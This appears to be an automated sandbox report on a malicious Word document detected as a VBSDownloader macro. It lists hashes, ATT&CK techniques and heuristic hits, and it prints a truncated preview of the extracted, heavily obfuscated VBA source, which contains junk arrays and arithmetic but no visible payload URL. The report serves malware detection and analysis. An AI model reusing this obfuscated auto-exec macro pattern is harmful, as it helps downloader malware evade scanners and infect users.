VBSDownloader Office (OLE) malware analysis — malicious · cdb19d274280f7a8

MALICIOUS

Office (OLE)

79.0 KB Created: 2017-08-25 14:29:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: c2bf3f8260b460ac72d97fa744e5a04c SHA-1: f7af8abbf82a4eca7f08ceaa539deccec2267555 SHA-256: cdb19d274280f7a8443063d1a8afb4df168e594268e1c4f74a15e42731dca39b

282 Risk Score

Malware Insights

VBSDownloader · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1140 Deobfuscate or Decode Files or Information T1204.002 Malicious File

The file contains a heavily obfuscated VBA macro with an AutoOpen function, indicative of a downloader. Heuristics indicate the use of CreateObject and execution functions, along with a ClamAV signature matching 'VBSDownloader'. The macro likely decodes and executes a second-stage payload, as suggested by the 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens' firings.

Heuristics 8

ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13683 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13683 bytes
SHA-256: `61c6942e0233992b5aec8d52f7d07920cac059ce44d390dec52ce4545dce3f39`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function ggHZrAH() NhdxTABby = 2504 Dim ZDLwfyR(2504) hxHuprCsK = "LnSWUXfnAMP" XmaHvZwXr = "pNzRNTWYeGs" rbrbKWmSa = "pumnrDGhgy" ZDLwfyR(1768) = NZpgevPN ZDLwfyR(647) = gKAHgKEumF ZDLwfyR(1248) = pLzEAgkTS ZDLwfyR(545) = vTfXxvmWY ZDLwfyR(1048) = 3692 + 3241 + 1686 / 9251 / 2387 - 2342 + 3104 + 676 ZDLwfyR(82) = 843 + 4439 / 2904 - 7792 + 9517 ZDLwfyR(470) = RgFRXKKkM ZDLwfyR(801) = UyPkGpsW ZDLwfyR(251) = dDLdDcmRDwL ZDLwfyR(710) = VETyCnrZZLh ZDLwfyR(749) = 6834 ZDLwfyR(2106) = tKSXfsUMaC ZDLwfyR(77) = rRVyxKy ZDLwfyR(484) = 7936 + 4160 + 2297 + 4082 / 5720 - 7651 + 8983 + 1411 For NhdxTABby = 731 To 236 ZDLwfyR(NhdxTABby) = NhdxTABby Next WttRfXgd = ZDLwfyR(781) + ZDLwfyR(898) + ZDLwfyR(2504) YvmCYKmM = ZDLwfyR(593) + ZDLwfyR(1000) + ZDLwfyR(1127) + ZDLwfyR(244) + ZDLwfyR(2504) HzvavnHwz = ZDLwfyR(2423) + ZDLwfyR(1082) + ZDLwfyR(1896) + ZDLwfyR(2326) + ZDLwfyR(1817) + ZDLwfyR(2504) End Function Function GwUFEFtF() grCEmTaHyK = 6822 Dim aVXBwuWV(6822) KeUfKeuy = "RZxMVknayT" NxAyHxu = "hGcaPYUXATG" syKuctb = "hKfnarZMes" aVXBwuWV(3215) = xLrDLAwXrH aVXBwuWV(1499) = 2372 + 7313 + 4576 + 9351 / 7044 / 3129 / 8696 - 3654 - 6812 - 8540 + 1066 + 371 + 323 aVXBwuWV(5600) = 4057 + 615 + 5887 / 2310 / 4003 / 1580 - 4280 - 6075 + 4845 + 6998 aVXBwuWV(2646) = 8313 + 577 + 4827 + 4148 / 1006 / 3709 / 1061 - 1943 - 2186 + 2847 + 8005 + 8561 aVXBwuWV(1282) = zUHgvrMNPf aVXBwuWV(96) = 1970 aVXBwuWV(2497) = 8889 aVXBwuWV(6214) = 9092 aVXBwuWV(2755) = McZPMNWcvN aVXBwuWV(5785) = syySAEW aVXBwuWV(4744) = TTtuFewLbn aVXBwuWV(407) = 4924 + 5224 + 756 / 5747 / 2024 / 5448 - 9548 - 3032 + 8581 aVXBwuWV(6011) = 1767 + 1854 / 5715 / 2502 / 2899 - 4313 - 3213 + 2786 + 1922 + 5644 aVXBwuWV(3320) = 5873 + 9559 + 4487 + 6311 / 848 - 5245 - 731 - 1251 + 6461 + 5836 + 6242 For grCEmTaHyK = 3857 To 285 aVXBwuWV(grCEmTaHyK) = grCEmTaHyK Next neeKMfyaE = aVXBwuWV(6719) + aVXBwuWV(1194) + aVXBwuWV(2664) + aVXBwuWV(270) + aVXBwuWV(6822) ewhVpGTb = aVXBwuWV(6339) + aVXBwuWV(222) + aVXBwuWV(5894) + aVXBwuWV(4975) + aVXBwuWV(4036) + aVXBwuWV(2582) + aVXBwuWV(6822) End Function Function vhNHRsRdK() aSgdhSz = 787 Dim CSbPSUrL(787) xkgGMebRK = "CkKLBkBZbbV" dcMFfDT = "PVNVnaRFMsw" CSbPSUrL(412) = ztHcWyFA CSbPSUrL(769) = gvgvZKsS CSbPSUrL(541) = EFSfeSE CSbPSUrL(339) = 3421 + 5699 + 1672 + 9169 / 1024 - 5720 + 1199 + 4759 CSbPSUrL(693) = fXfyaMyr CSbPSUrL(568) = DxsNGMc CSbPSUrL(113) = 8323 CSbPSUrL(183) = 6140 CSbPSUrL(672) = 3152 CSbPSUrL(324) = sMgKwyyD CSbPSUrL(77) = psgcdmxgz CSbPSUrL(516) = UCRFgFTnpL CSbPSUrL(361) = 4357 + 642 / 5608 / 9553 - 1432 - 377 - 2131 + 6262 + 6395 CSbPSUrL(692) = 5879 + 4923 + 5377 + 9103 / 4117 / 1333 - 5129 + 4755 + 8012 CSbPSUrL(142) = 2063 + 2590 + 3049 / 5264 / 7937 / 7701 - 5420 + 5570 + 468 + 1642 For aSgdhSz = 711 To 93 CSbPSUrL(aSgdhSz) = aSgdhSz Next RKDHadwff = CSbPSUrL(82) + CSbPSUrL(260) + CSbPSUrL(93) + CSbPSUrL(534) + CSbPSUrL(55) + CSbPSUrL(787) cxYUmfZ = CSbPSUrL(507) + CSbPSUrL(481) + CSbPSUrL(545) + CSbPSUrL(82) + CSbPSUrL(66) + CSbPSUrL(787) End Function Function MRDWNun() GFrdeFg = 1671 Dim GVHnCaM(1671) sdGbMkWV = "LTNekbMyHz" ZBxdgHNxz = "VzkGTcxWZN" bYhRNTHNE = "znCdABEVc" GVHnCaM(375) = zNeXbnn GVHnCaM(959) = 9318 + 2153 + 8734 / 4786 - 3913 + 7206 + 3357 + 9319 GVHnCaM(795) = DwwRNXnN GVHnCaM(948) = 6632 GVHnCaM(1589) = GrsdTtRRyB GVHnCaM(1608) = DmnCWcmE GVHnCaM(1292) = HRdUfgcrwt GVHnCaM(1466) = BUkHcNbVgkM GVHnCaM(965) = 8876 + 8151 + 2573 + 7598 / 1250 - 9171 - 743 + 1297 + 397 + 4767 For GFrdeFg = 1255 To 1455 GVHnCaM(GFrdeFg) = GFrdeFg Next hYXkSbwsRM = GVHnCaM(293) + GVHnCaM(1234) + GVHnCaM(1033) + GVHnCaM(260) + ... (truncated)

SHA-256: 61c6942e0233992b5aec8d52f7d07920cac059ce44d390dec52ce4545dce3f39

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function ggHZrAH()
NhdxTABby = 2504
Dim ZDLwfyR(2504)
hxHuprCsK = "LnSWUXfnAMP"
 XmaHvZwXr = "pNzRNTWYeGs"
 rbrbKWmSa = "pumnrDGhgy"
 ZDLwfyR(1768) = NZpgevPN
 ZDLwfyR(647) = gKAHgKEumF
 ZDLwfyR(1248) = pLzEAgkTS
 ZDLwfyR(545) = vTfXxvmWY
 ZDLwfyR(1048) = 3692 + 3241 + 1686 / 9251 / 2387 - 2342 + 3104 + 676
 ZDLwfyR(82) = 843 + 4439 / 2904 - 7792 + 9517
 ZDLwfyR(470) = RgFRXKKkM
 ZDLwfyR(801) = UyPkGpsW
 ZDLwfyR(251) = dDLdDcmRDwL
 ZDLwfyR(710) = VETyCnrZZLh
 ZDLwfyR(749) = 6834
 ZDLwfyR(2106) = tKSXfsUMaC
 ZDLwfyR(77) = rRVyxKy
 ZDLwfyR(484) = 7936 + 4160 + 2297 + 4082 / 5720 - 7651 + 8983 + 1411
  For NhdxTABby = 731 To 236
ZDLwfyR(NhdxTABby) = NhdxTABby
Next
WttRfXgd = ZDLwfyR(781) + ZDLwfyR(898) + ZDLwfyR(2504)
 YvmCYKmM = ZDLwfyR(593) + ZDLwfyR(1000) + ZDLwfyR(1127) + ZDLwfyR(244) + ZDLwfyR(2504)
 HzvavnHwz = ZDLwfyR(2423) + ZDLwfyR(1082) + ZDLwfyR(1896) + ZDLwfyR(2326) + ZDLwfyR(1817) + ZDLwfyR(2504)
End Function
Function GwUFEFtF()
grCEmTaHyK = 6822
Dim aVXBwuWV(6822)
KeUfKeuy = "RZxMVknayT"
 NxAyHxu = "hGcaPYUXATG"
 syKuctb = "hKfnarZMes"
 aVXBwuWV(3215) = xLrDLAwXrH
 aVXBwuWV(1499) = 2372 + 7313 + 4576 + 9351 / 7044 / 3129 / 8696 - 3654 - 6812 - 8540 + 1066 + 371 + 323
 aVXBwuWV(5600) = 4057 + 615 + 5887 / 2310 / 4003 / 1580 - 4280 - 6075 + 4845 + 6998
 aVXBwuWV(2646) = 8313 + 577 + 4827 + 4148 / 1006 / 3709 / 1061 - 1943 - 2186 + 2847 + 8005 + 8561
 aVXBwuWV(1282) = zUHgvrMNPf
 aVXBwuWV(96) = 1970
 aVXBwuWV(2497) = 8889
 aVXBwuWV(6214) = 9092
 aVXBwuWV(2755) = McZPMNWcvN
 aVXBwuWV(5785) = syySAEW
 aVXBwuWV(4744) = TTtuFewLbn
 aVXBwuWV(407) = 4924 + 5224 + 756 / 5747 / 2024 / 5448 - 9548 - 3032 + 8581
 aVXBwuWV(6011) = 1767 + 1854 / 5715 / 2502 / 2899 - 4313 - 3213 + 2786 + 1922 + 5644
 aVXBwuWV(3320) = 5873 + 9559 + 4487 + 6311 / 848 - 5245 - 731 - 1251 + 6461 + 5836 + 6242
  For grCEmTaHyK = 3857 To 285
aVXBwuWV(grCEmTaHyK) = grCEmTaHyK
Next
neeKMfyaE = aVXBwuWV(6719) + aVXBwuWV(1194) + aVXBwuWV(2664) + aVXBwuWV(270) + aVXBwuWV(6822)
 ewhVpGTb = aVXBwuWV(6339) + aVXBwuWV(222) + aVXBwuWV(5894) + aVXBwuWV(4975) + aVXBwuWV(4036) + aVXBwuWV(2582) + aVXBwuWV(6822)
End Function
Function vhNHRsRdK()
aSgdhSz = 787
Dim CSbPSUrL(787)
xkgGMebRK = "CkKLBkBZbbV"
 dcMFfDT = "PVNVnaRFMsw"
 CSbPSUrL(412) = ztHcWyFA
 CSbPSUrL(769) = gvgvZKsS
 CSbPSUrL(541) = EFSfeSE
 CSbPSUrL(339) = 3421 + 5699 + 1672 + 9169 / 1024 - 5720 + 1199 + 4759
 CSbPSUrL(693) = fXfyaMyr
 CSbPSUrL(568) = DxsNGMc
 CSbPSUrL(113) = 8323
 CSbPSUrL(183) = 6140
 CSbPSUrL(672) = 3152
 CSbPSUrL(324) = sMgKwyyD
 CSbPSUrL(77) = psgcdmxgz
 CSbPSUrL(516) = UCRFgFTnpL
 CSbPSUrL(361) = 4357 + 642 / 5608 / 9553 - 1432 - 377 - 2131 + 6262 + 6395
 CSbPSUrL(692) = 5879 + 4923 + 5377 + 9103 / 4117 / 1333 - 5129 + 4755 + 8012
 CSbPSUrL(142) = 2063 + 2590 + 3049 / 5264 / 7937 / 7701 - 5420 + 5570 + 468 + 1642
  For aSgdhSz = 711 To 93
CSbPSUrL(aSgdhSz) = aSgdhSz
Next
RKDHadwff = CSbPSUrL(82) + CSbPSUrL(260) + CSbPSUrL(93) + CSbPSUrL(534) + CSbPSUrL(55) + CSbPSUrL(787)
 cxYUmfZ = CSbPSUrL(507) + CSbPSUrL(481) + CSbPSUrL(545) + CSbPSUrL(82) + CSbPSUrL(66) + CSbPSUrL(787)
End Function
Function MRDWNun()
GFrdeFg = 1671
Dim GVHnCaM(1671)
sdGbMkWV = "LTNekbMyHz"
 ZBxdgHNxz = "VzkGTcxWZN"
 bYhRNTHNE = "znCdABEVc"
 GVHnCaM(375) = zNeXbnn
 GVHnCaM(959) = 9318 + 2153 + 8734 / 4786 - 3913 + 7206 + 3357 + 9319
 GVHnCaM(795) = DwwRNXnN
 GVHnCaM(948) = 6632
 GVHnCaM(1589) = GrsdTtRRyB
 GVHnCaM(1608) = DmnCWcmE
 GVHnCaM(1292) = HRdUfgcrwt
 GVHnCaM(1466) = BUkHcNbVgkM
 GVHnCaM(965) = 8876 + 8151 + 2573 + 7598 / 1250 - 9171 - 743 + 1297 + 397 + 4767
  For GFrdeFg = 1255 To 1455
GVHnCaM(GFrdeFg) = GFrdeFg
Next
hYXkSbwsRM = GVHnCaM(293) + GVHnCaM(1234) + GVHnCaM(1033) + GVHnCaM(260) +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.